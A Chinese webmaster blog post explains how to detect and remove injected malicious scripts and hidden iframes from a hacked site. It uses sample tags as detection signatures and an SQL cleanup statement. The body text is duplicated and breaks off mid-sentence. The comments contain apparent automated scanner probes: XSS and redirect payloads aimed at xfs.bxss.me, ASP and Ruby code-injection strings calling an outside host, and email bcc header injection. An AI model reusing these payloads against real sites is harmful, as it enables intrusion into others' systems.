投稿

网站被挂马 如何处理网站被挂马很简单-中国网

zhuanyeseo 6年前 (2018-02-06) SEO教程 阅读 11477 添加收藏

  网站从创建到现在已经有N年多了,网站被挂马了,一听网站挂马我就懵了,不知所措,以前我真的没遇到过,也不知道什么是挂马,在网上搜索了整整3天,终于把网站被挂马给摸透了,我猜很多像我第一次遇到网站被挂马的站长一定也很头疼,不要疼,还有我呢,下面我就给大家谈谈我是怎么解决网站被挂马的!   

网站被挂马

网站被挂马有什么影响?  

网站数量的日益增长,给互联网增加了许多信息和色彩,对于日益增长的网民来说更是一件好事,但是网站多了却成了一个一个黑客们的目标,黑客们为了赚钱不惜一切代价,去入侵网站并挂马,导致互联网的黑色链接越来越丰富,用户用木马病毒的也越来越多。影响分两面,一面是对于用户的影响,如QQ账号被盗、游戏帐号被、银行账户被盗,损失是很大的,另一面是对于站长们的影响,网站被挂马后,搜索引擎会立刻降权,排名都会下降,网站数据也有可能会被窃取并传播。   

网站被挂马是什么?   

很多新手站长不懂什么是挂马,我就大体的介绍一下:网站被挂马是指网站被黑客恶意的上传了木马,并把恶意的带病毒的代码嵌入到网站的首页或者各个地方,这些挂马分很多种,有图片挂马、框架挂马、js挂马、global.asa挂马、还有IFRAME挂马,等等。  

如何检测自己的网站是否被挂马呢?  

我在这里给大家说一下我检测网站被挂马的方法,首先打开自己的网站然后右键查看源代码,一般挂马都会挂在首页代码的中部或者最底部,看到有一些自己不认识的网站链接那一般就是网站被人给挂马了,另一种检测方法就是用FTP权限去查看自己的网站程序,看看有没有自己不熟悉的文件名和js文件,如果有那就是挂马,再一个就是黑客上传的脚本木马一般是30-90KB左右的文件,也可以根据文件大小来判断,如果你什么都不懂,也可以用sine安全网站被挂马检测工具来检测,我网站用这个工具用了不到5分钟就很快查出了很多网站木马代码。  

如何解决网站被挂马?   

上面讲了如何检测挂马,一般人都能看懂,实在不懂可以用sine安全挂马检测工具来检测那是最简单不过的了。一般站长碰到网站被挂马怎么办呢?首先不要急,网站的程序最重要,要先备份下网站程序和数据库。然后本地架设环境来清理木马代码,千万不要在FTP上直接操作,那样会让你更难处理挂马。

挂马的种类很多,上面我已经详细介绍过了,再实际情况中如果遇到不同种类的挂马,可以一一对应处理,下面我把我研究的一套挂马解决方案贡献出来,希望能帮到大家,我也是站长,网站被挂马的心情我也知。我也希望你们遇到问题都高高兴兴的去处理解决。 

  清马

1global.asa 一般是这个文件。删除就好了。 

2、找挂马的标签,比如有<script language="javascript" src="网马地址"></script> <iframe width=400 height=350 frameborder=0 scrolling=auto src=网马地址></iframe>, 有的是框架为0的也是挂马特征,以上算上挂马的综合特征,必须先找到挂马代码,然后接下来是处理挂马。  

3、找到了恶意代码后,接下来就是清马,如果是网页被挂马,可以用手动清,也可以用批量清, 网页清马比较简单,不会的可以用sinesafe挂马清理工具来处理,现在着重讲一下SQL数据库清马, 用这一句语句“update 表名set 字段名=replace(字段名,'aaa','')”,

解释一下这一句子的意思 :把字段名里的内容包含aaa的替换成空,这样子就可以一个表一个表的批量删除网马。 再删除挂马之前千万要备份下数据库,因为清理木马的同时也有应如何解决  

 网站从创建到现在已经有1年多了,一直运行正常,访问也很稳定,直到昨天一个朋友告诉我说我的网站被挂马了,当时我一听网站挂马我就懵了,不知所措,以前我真的没遇到过,也不知道什么是挂马,在网上搜索了整整3天,终于把网站被挂马给摸透了,我猜很多像我第一次遇到网站被挂马的站长一定也很头疼,不要疼,还有我呢,下面我就给大家谈谈我是怎么解决网站被挂马的!

   网站被挂马有什么影响?  

网站数量的日益增长,给互联网增加了许多信息和色彩,对于日益增长的网民来说更是一件好事,但是网站多了却成了一个一个黑客们的目标,黑客们为了赚钱不惜一切代价,去入侵网站并挂马,导致互联网的黑色链接越来越丰富,用户用木马病毒的也越来越多。

影响分两面,一面是对于用户的影响,如QQ账号被盗、游戏帐号被、银行账户被盗,损失是很大的,另一面是对于站长们的影响,网站被挂马后,搜索引擎会立刻降权,排名都会下降,网站数据也有可能会被窃取并传播。  

 网站被挂马是什么?   

很多新手站长不懂什么是挂马,我就大体的介绍一下:网站被挂马是指网站被黑客恶意的上传了木马,并把恶意的带病毒的代码嵌入到网站的首页或者各个地方,这些挂马分很多种,有图片挂马、框架挂马、js挂马、global.asa挂马、还有IFRAME挂马,等等。  

如何检测自己的网站是否被挂马呢?  

我在这里给大家说一下我检测网站被挂马的方法,首先打开自己的网站然后右键查看源代码,一般挂马都会挂在首页代码的中部或者最底部,看到有一些自己不认识的网站链接那一般就是网站被人给挂马了,另一种检测方法就是用FTP权限去查看自己的网站程序,看看有没有自己不熟悉的文件名和js文件,如果有那就是挂马,再一个就是黑客上传的脚本木马一般是30-90KB左右的文件,也可以根据文件大小来判断,如果你什么都不懂,也可以用sine安全网站被挂马检测工具来检测,我网站用这个工具用了不到5分钟就很快查出了很多网站木马代码。  

如何解决网站被挂马?   

上面讲了如何检测挂马,一般人都能看懂,实在不懂可以用sine安全挂马检测工具来检测那是最简单不过的了。一般站长碰到网站被挂马怎么办呢?首先不要急,网站的程序最重要,要先备份下网站程序和数据库。然后本地架设环境来清理木马代码,千万不要在FTP上直接操作,那样会让你更难处理挂马。挂马的种类很多,上面我已经详细介绍过了,再实际情况中如果遇到不同种类的挂马,可以一一对应处理,下面我把我研究的一套挂马解决方案贡献出来,希望能帮到大家,我也是站长,网站被挂马的心情我也知。我也希望你们遇到问题都高高兴兴的去处理解决。  

 清马  

 1、找挂马的标签,比如有<script language="javascript" src="网马地址"></script> <iframe width=400 height=350 frameborder=0 scrolling=auto src=网马地址></iframe>, 有的是框架为0的也是挂马特征,以上算上挂马的综合特征,必须先找到挂马代码,然后接下来是处理挂马。    2、找到了恶意代码后,接下来就是清马,如果是网页被挂马,可以用手动清,也可以用批量清, 网页清马比较简单,不会的可以用sinesafe挂马清理工具来处理,现在着重讲一下SQL数据库清马, 用这一句语句“update 表名set 字段名=replace(字段名,'aaa','')”,解释一下这一句子的意思 :把字段名里的内容包含aaa的替换成空,这样子就可以一个表一个表的批量删除网马。 再删除挂马之前千万要备份下数据库,因为清理木马的同时也有


本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://www.zhuanyeseo.com/post/60.html

赞(5)
zhuanyeseo zhuanyeseo
668
上一篇 2018年02月02日 15:15
下一篇 2018年02月06日 23:59

相关推荐

共有 668 条评论

  1. avatar

    百度云安全

    一旦发现网站有挂马,泛解析,快照劫持,首页自动跳转等情况,检查看下网站的源代码,将非网站本身的代码去除,然后需要修复网站漏洞,不给黑客可乘之机;一般这种情况都是反复性质的被篡改跳转,清理恶意跳转代码后没过多久就又被篡改了,关于网站的漏洞修复,以及网站安全防护可以找专业的网站安全公司来处理,国内也就SINE安全,绿盟,启明星辰等安全公司比较专业,然后再修改网站相关的用户名与密码,找服务器安全公司加强服务器端的安全设置;通过申诉的方式尽可能减小网站的流量,排名损失。

    2019-02-15 13:27 回复
  2. avatar

    gBqsPxAZ

    1

    2022-12-02 02:54 回复
  3. avatar

    gBqsPxAZ

    1

    2022-12-02 06:27 回复
  4. avatar

    HfjNUlYZ

    1

    2023-05-12 18:19 回复
  5. avatar

    HfjNUlYZ

    1

    2023-05-12 18:20 回复
  6. avatar

    HfjNUlYZ

    1

    2023-05-12 18:20 回复
  7. avatar

    HfjNUlYZ

    1

    2023-05-12 18:20 回复
  8. avatar

    HfjNUlYZ

    1

    2023-05-12 18:20 回复
  9. avatar

    HfjNUlYZ

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

    2023-05-12 18:20 回复
  10. avatar

    HfjNUlYZ

    1

    2023-05-12 18:20 回复
  11. avatar

    HfjNUlYZ

    1

    2023-05-12 18:20 回复
  12. avatar

    HfjNUlYZ

    1

    2023-05-12 18:20 回复
  13. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  14. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  15. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  16. avatar

    HfjNUlYZ

    cmd.php

    2023-05-12 18:21 回复
  17. avatar

    HfjNUlYZ

    cmd.php

    2023-05-12 18:21 回复
  18. avatar

    HfjNUlYZ

    cmd.php/.

    2023-05-12 18:21 回复
  19. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  20. avatar

    HfjNUlYZ

    xfs.bxss.me

    2023-05-12 18:21 回复
  21. avatar

    HfjNUlYZ

    915303

    2023-05-12 18:21 回复
  22. avatar

    HfjNUlYZ

    http://xfs.bxss.me?zhuanyeseo.com

    2023-05-12 18:21 回复
  23. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  24. avatar

    HfjNUlYZ

    xfs.bxss.me?zhuanyeseo.com

    2023-05-12 18:21 回复
  25. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  26. avatar

    HfjNUlYZ

    //xfs.bxss.me?zhuanyeseo.com

    2023-05-12 18:21 回复
  27. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  28. avatar

    HfjNUlYZ

    /\xfs.bxss.me?zhuanyeseo.com

    2023-05-12 18:21 回复
  29. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  30. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  31. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  32. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  33. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  34. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  35. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  36. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  37. avatar

    HfjNUlYZ

    response.write(9200903*9788588)

    2023-05-12 18:21 回复
  38. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  39. avatar

    cmd.php

    1

    2023-05-12 18:21 回复
  40. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  41. avatar

    xfs.bxss.me

    1

    2023-05-12 18:21 回复
  42. avatar

    HfjNUlYZ

    '+response.write(9200903*9788588)+'

    2023-05-12 18:21 回复
  43. avatar

    HfjNUlYZ

    "+"A".concat(70-3).concat(22*4).concat(114).concat(85).concat(118).concat(78)+(require"socket"
    Socket.gethostbyname("hitac"+"qxfmqfuv50c5b.bxss.me.")[3].to_s)+"

    2023-05-12 18:21 回复
  44. avatar

    959348

    1

    2023-05-12 18:21 回复
  45. avatar

    HfjNUlYZ

    "+response.write(9200903*9788588)+"

    2023-05-12 18:21 回复
  46. avatar

    HfjNUlYZ

    '+'A'.concat(70-3).concat(22*4).concat(97).concat(85).concat(100).concat(69)+(require'socket'
    Socket.gethostbyname('hitew'+'tftzjmti0e654.bxss.me.')[3].to_s)+'

    2023-05-12 18:21 回复
  47. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  48. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  49. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  50. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  51. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  52. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  53. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  54. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  55. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  56. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  57. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  58. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  59. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  60. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  61. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  62. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  63. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  64. avatar

    HfjNUlYZ

    H1vaS6u4

    2023-05-12 18:21 回复
  65. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  66. avatar

    HfjNUlYZ

    1

    2023-05-12 18:21 回复
  67. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  68. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  69. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  70. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  71. avatar

    hCk5FFM6

    1

    2023-05-12 18:22 回复
  72. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  73. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  74. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  75. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  76. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  77. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  78. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  79. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  80. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  81. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  82. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  83. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  84. avatar

    HfjNUlYZ

    1
    bcc:074625.4000-18395.4000.4e470.19489.2@bxss.me

    2023-05-12 18:22 回复
  85. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  86. avatar

    HfjNUlYZ

    to@example.com˃
    bcc:074625.4000-18396.4000.4e470.19489.2@bxss.me

    2023-05-12 18:22 回复
  87. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  88. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  89. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  90. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  91. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  92. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  93. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  94. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  95. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  96. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  97. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  98. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  99. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复
  100. avatar

    HfjNUlYZ

    1

    2023-05-12 18:22 回复

回复给

欢迎点评

联系我们

站长QQ:40508326

站长邮件:405083426@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code